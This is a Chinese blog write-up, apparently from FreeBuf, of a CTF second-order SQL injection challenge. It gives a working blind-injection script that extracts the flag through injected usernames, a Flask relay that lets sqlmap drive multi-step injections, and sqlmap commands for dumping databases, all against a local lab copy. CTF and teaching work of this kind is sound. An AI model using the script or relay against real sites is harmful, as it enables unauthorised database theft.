前言
在渗透工作中我们经常能碰到一些逻辑复杂的SQL注入漏洞,并不能直接通过sqlmap工具注入拿到结果。今年网鼎杯的一道SQL注入题“张三的网站”让我久久不能忘怀,我不断思考遇到这类型的SQL注入除了手工注入然后编写脚本一点一点脱数据以外,有没有一个比较优雅的解决方案呢?
一道CTF题的思考
先来说说“张三的网站”这道题目,因为我手上没有题目源码,所以就根据记忆中的各个功能自己写了一个(很少写php,代码很烂),相关代码已经上传到GitHub,见文章底部。
该题目主要涉及3个页面:
- 登陆页面
- 注册页面
- 登陆后的主页
题目中的登陆页面、注册页面均无SQL注入漏洞,但是登陆后的主页在用户名处存在SQL注入漏洞。要利用此漏洞,需要在注册页面控制用户名,邮箱使用随机数生成的邮箱,密码随意,然后使用邮箱和注册时的密码登陆,登陆成功后跳转到主页,此时触发SQL注入漏洞。
注册名为“123”的用户:
注册名为“123’”的用户:
以下是一个Python脚本手工注入的解法:
import requests import random import re import string proxy = {'http': '127.0.0.1:8080'} session = requests.session() def register(username, email, password='123'): burp0_url = "http://192.168.154.130:80/web/register.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/register.php", "Upgrade-Insecure-Requests": "1"} burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''} r = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy) def login(email, password='123'): burp0_url = "http://192.168.154.130:80/web/login.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/login.php", "Upgrade-Insecure-Requests": "1"} burp0_data = {"email": email, "pw": password, "submit": ''} r1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy) # 跳转首页 burp0_url = "http://192.168.154.130/web/index.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Referer": "http://a434051f6c184741b1ede6b610a15f805a546b5b172748e9.changame.ichunqiu.com/login.php", "Connection": "close", "Upgrade-Insecure-Requests": "1"} r2 = session.get(burp0_url, headers=burp0_headers, proxies=proxy) if r2.status_code == 302: print('username payload no work') elif r2.status_code == 200: pattern = '''<span class="user-name">(.+?)</span>''' try: userr = re.findall(pattern, r2.text, re.DOTALL)[0] if userr: return True else: return False except: return False def main(): key = string.ascii_lowercase + string.digits + '{}_-' flag = '' for keynum in range(1, 43): for s in key: username = r"""'or(substr((select e.a from (select (select 1)a union select * from flag)e limit 2 offset 1) from {0} for 1) = '{1}') and '1""".format(keynum, s) email = '{}@qq.com'.format(int(random.random() * 10000000)) register(username, email) if login(email): flag += s print('key: ' + flag) break if __name__ == "__main__": main()
如果对ctf不熟悉的朋友应该会很懵,因为语句中直接查询获取了flag表中的内容,而正常情况下,我们是不知道真正的flag在上面表,这样的解法我个人觉得不具备通用性,当然了在ctf比赛中是很高效的。
那么,有没有可能通过sqlmap来进行注入呢?显然,直接使用sqlmap不进行二次开发是无法检测出注入点的,因为sqlmap的注入逻辑不支持多个数据包的逻辑处理。于是我在想有无一种办法,拿到sqlmap的注入检测payload,然后我们通过Python编写相应的请求逻辑,再把响应结果返回到sqlmap呢?答案是可行的!
Flask中转sqlmap注入
代码实现的结构如下,首先创建一个flask服务,接收payload参数的值,然后传入函数custom_fun中,custom_fun函数由自己编写请求逻辑,把payload参数的值填入到存在注入点的参数中,然后发起请求,把最终响应结果return就行。最后通过sqlmap检测URL:http://127.0.0.1:5000/?payload=1即可,可以适当调整sqlmap的注入参数,比如–level、–risk、–technique等。
from flask import Flask from flask import request import requests import random def custom_fun(payload): return '' app = Flask(__name__) @app.route('/', methods=['GET', 'POST']) def index(): if request.method == 'GET': payload = request.args.get('payload') elif request.method == 'POST': payload = request.form.get('payload') return custom_fun(payload) def main(): app.run(host='127.0.0.1', debug=True) if __name__ == "__main__": main()
流程示意图如下:
完整注入过程
先来看看本例的实现代码:
from flask import Flask from flask import request import requests import random def custom_fun(payload): email = '{}@qq.com'.format(int(random.random() * 10000000)) username = payload password = '123' proxy = {'http': '127.0.0.1:8080'} session = requests.session() # 注册 burp0_url = "http://192.168.154.130:80/web/register.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/register.php", "Upgrade-Insecure-Requests": "1"} burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''} resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy) # 登陆 burp0_url = "http://192.168.154.130:80/web/login.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/login.php", "Upgrade-Insecure-Requests": "1"} burp0_data = {"email": email, "pw": password, "submit": ''} r1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy) # 登陆后跳转到首页 burp0_url = "http://192.168.154.130/web/index.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Connection": "close", "Upgrade-Insecure-Requests": "1"} resp = session.get(burp0_url, headers=burp0_headers, proxies=proxy) resp.encoding = resp.apparent_encoding return resp.text app = Flask(__name__) @app.route('/', methods=['GET', 'POST']) def index(): if request.method == 'GET': payload = request.args.get('payload') elif request.method == 'POST': payload = request.form.get('payload') return custom_fun(payload) def main(): app.run(host='127.0.0.1', debug=True) if __name__ == "__main__": main()
从代码上可以看到,只需要把请求逻辑写到custom_fun函数中,把最终结果的响应包return给flask,剩下的就可以交给sqlmap了,优雅!
这里说一个小技巧,可以使用Burp的拓展Copy As Python-Requests来一键把burp的请求复制为Python requests请求:
然后使用sqlmap测试一下,因为是通过本地flask中转,我们的sqlmap的target应该是本地的flask服务端口,命令如下:
sqlmap -u http://127.0.0.1:5000/?payload=1
检测时flask服务的输出:
成功检测到注入点:
当前数据库:
sqlmap -u http://127.0.0.1:5000/?payload=1 –current-db
跑表名:
sqlmap -u http://127.0.0.1:5000/?payload=1 -D test –tables
跑flag表数据:
sqlmap -u http://127.0.0.1:5000/?payload=1 -D test -T flag –dump
小结
Flask中转sqlmap注入并非本人原创,互联网上已有前辈发表过相关的案例,这里以一个ctf题目作为案例,来更加优雅地进行SQL注入。挖洞是不可能挖洞的,这辈子都不可能挖洞的,手工注入又不会,只能靠sqlmap,才能维持得了生活这样子…
测试环境代码:
GitHub:https://github.com/ryanInf/fakeZhangSan
来源:freebuf.com 2020-07-21 11:35:04 by: r0yanx
请登录后发表评论
注册